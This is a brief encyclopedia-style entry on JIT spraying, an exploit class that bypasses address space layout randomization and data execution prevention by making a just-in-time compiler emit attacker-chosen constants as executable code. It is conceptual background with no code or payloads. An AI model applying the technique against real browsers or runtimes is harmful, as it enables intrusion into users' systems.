JIT spraying

JIT spraying is a class of computer security exploit that circumvents the protection of address space layout randomization and data execution prevention by exploiting the behavior of just-in-time compilation.

Since the purpose is to produce executable data, a JIT compiler is one of the few types of programs that cannot be run in a no-executable-data environment.

To produce exploit code from JIT, an idea from Dion Blazakis[4] is used.

The input program, usually JavaScript or ActionScript, typically contains numerous constant values that can be erroneously executed as code.

For example, a buffer overflow or use after free bug could allow the attack to modify a function pointer or return address.